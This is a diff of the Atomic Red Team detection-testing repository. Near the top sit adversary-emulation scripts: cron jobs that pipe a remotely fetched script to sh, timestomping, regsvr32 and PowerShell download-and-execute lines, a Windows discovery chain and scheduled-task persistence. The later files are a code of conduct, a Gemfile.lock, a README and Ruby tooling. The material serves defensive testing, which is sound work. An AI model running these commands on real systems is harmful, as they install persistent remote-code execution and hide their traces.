echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
ARTifacts/Labs/Webinar11062017-Labs.bat
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
atomics/T1547.001/src/Discovery.bat → ARTifacts/Misc/Discovery.bat
+1 -1
View File
@@ -8,7 +8,7 @@ net config workstation
net accounts
net accounts /domain
net view
sc.exe query
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
ARTifacts/Misc/flag.txt
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
CODE_OF_CONDUCT.md
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter if its privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
Gemfile
+2
View File
@@ -0,0 +1,2 @@
source "https://rubygems.org"
gemspec
Gemfile.lock
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.0)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.8.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.2.0)
commonmarker (~> 0.14)
jekyll (>= 3.0, < 4.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.4.1)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.16.1
README.md
+44 -28
View File
@@ -1,45 +1,61 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1750-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
## Philosophy
Atomic Red Team is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.
## Get started
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We dont have to detect every adversary, but we
do believe in knowing our blind spots.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
The best test is the one you actually run.
## Learn more
- **We need to keep learning how adversaries are operating.**
Most security teams dont have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
See: https://atomicredteam.io
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
## Having trouble?
To stay up to date on all things Atomic Red Team, sign up for the Atomic Newsletter: https://redcanary.com/atomic-newsletter/
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
## Contribute to Atomic Red Team
## Getting Started
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
- Linux [Tests](atomics/linux-index.md) and [Matrix](atomics/linux-matrix.md)
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
* [Doing more with Atomic Red Team](#doing-more-with-atomic-red-team)
* [Using the Atomic Red Team Ruby API](#using-the-atomic-red-team-ruby-api)
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
- Contribute to linux atomics quickly from GitHub Codespaces. For more details, click [here](https://github.com/redcanaryco/atomic-red-team/wiki/Github-Codespaces)
## Code of Conduct
[![Open in GitHub Codespaces](https://github.com/codespaces/badge.svg)](https://codespaces.new/redcanaryco/atomic-red-team)
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
atomic-red-team.gemspec
+15
View File
@@ -0,0 +1,15 @@
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = 'atomic-red-team'
s.version = '1.0'
s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
s.license = "MIT"
s.homepage = "https://redcanary.com/atomic-red-team"
s.files = %w(atomic-red-team.gemspec) + Dir['{atomic_red_team}/**/*', '*.md', 'bin/*']
s.test_files = Dir['spec/**/*']
s.require_paths = %w(atomic_red_team)
s.add_development_dependency 'github-pages'
end
atomic_red_team/__init__.py
View File
atomic_red_team/atomic_doc_template.md.erb
+49
View File
@@ -0,0 +1,49 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<% title = "Atomic Test ##{test_number+1} - #{test['name']}" %>
- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
<% end %>
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<br/>
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<br/>
<%- end -%>
atomic_red_team/atomic_doc_template.md.j2
-85
View File
@@ -1,85 +0,0 @@
# {{ technique['identifier'] }} - {{ technique['name'] }}
## [Description from ATT&CK](https://attack.mitre.org/techniques/{{ technique['identifier'].replace('.', '/') }})
<blockquote>
{{ technique['description'].replace("%\\<", "%<") }}
</blockquote>
## Atomic Tests
{% for test in atomic_yaml['atomic_tests'] -%}
{% set title = "Atomic Test #" ~ (loop.index) ~ " - " ~ test['name'] -%}
- [{{ title }}](#{{ title | slugify }})
{% endfor %}
{% for test in atomic_yaml['atomic_tests'] -%}
<br/>
## Atomic Test #{{ loop.index }} - {{ test['name'] }}
{{ test['description'].strip() }}
**Supported Platforms:** {{ test['supported_platforms'] | map('platform_display') | join(', ') }}
**auto_generated_guid:** {{ test['auto_generated_guid'] }}
{% if test.get('input_arguments') and test['input_arguments'] | length > 0 %}
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
{% for arg_name, arg_options in test['input_arguments'].items() -%}
| {{ arg_name | cleanup }} | {{ arg_options['description'] | cleanup }} | {{ arg_options['type'] | cleanup }} | {{ arg_options.get('default', '') | cleanup }}|
{% endfor %}
{% endif %}
{%- if test['executor']['name'] == 'manual' %}
#### Run it with these steps! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
{{ test['executor']['steps'] }}
{% else %}
#### Attack Commands: Run with `{{ test['executor']['name'] }}`! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
```{{ test['executor']['name'] | get_language }}
{{ test['executor']['command'].strip() }}
```
{% if test['executor'].get('cleanup_command') %}
#### Cleanup Commands:
```{{ test['executor']['name'] | get_language }}
{{ test['executor']['cleanup_command'].strip() }}
```
{% endif %}
{% endif %}
{% if test.get('dependencies') and test['dependencies'] | length > 0 -%}
#### Dependencies: Run with `{{ test.get('dependency_executor_name') or test['executor']['name'] }}`!
{% for dep in test['dependencies'] -%}
##### Description: {{ dep['description'].strip() }}
##### Check Prereq Commands:
```{{ (test.get('dependency_executor_name') or test['executor']['name']) | get_language }}
{{ dep['prereq_command'].strip() }}
```
##### Get Prereq Commands:
```{{ (test.get('dependency_executor_name') or test['executor']['name']) | get_language }}
{{ dep['get_prereq_command'].strip() }}
```
{% endfor %}
{% endif %}
<br/>
{% endfor -%}
atomic_red_team/atomic_execution_template.html.erb
+1
View File
@@ -0,0 +1 @@
TBD
atomic_red_team/atomic_red_team.rb
Executable
+173
View File
@@ -0,0 +1,173 @@
require 'yaml'
require 'erb'
require 'attack_api'
class AtomicRedTeam
ATTACK_API = Attack.new
ATOMICS_DIRECTORY = "#{File.dirname(File.dirname(__FILE__))}/atomics"
# TODO- should these all be relative URLs?
ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"
#
# Returns a list of paths that contain Atomic Tests
#
def atomic_test_paths
Dir["#{ATOMICS_DIRECTORY}/T*/T*.yaml"].sort
end
#
# Returns a list of Atomic Tests in Atomic Red Team (as Hashes from source YAML)
#
def atomic_tests
@atomic_tests ||= atomic_test_paths.collect do |path|
atomic_yaml = YAML.load(File.read path)
atomic_yaml['atomic_yaml_path'] = path
atomic_yaml
end
end
#
# Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
#
def atomic_tests_for_technique(technique_or_technique_identifier)
technique_identifier = if technique_or_technique_identifier.is_a? Hash
ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
else
technique_or_technique_identifier
end
atomic_tests.find do |atomic_yaml|
atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
end.to_h.fetch('atomic_tests', [])
end
#
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
# techniques that already have one or more Atomic Red Team tests, or the create page for
# techniques that have no existing tests.
#
def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
# we have a file for this technique, so link to it's Markdown file
"[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
else
# we don't have a file for this technique, so link to an edit page
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
end
end
def validate_atomic_yaml!(yaml)
raise("YAML file has no elements") if yaml.nil?
raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
raise('`attack_technique` element must be an array') unless yaml['attack_technique'].is_a?(String)
raise('`display_name` element is required') unless yaml.has_key?('display_name')
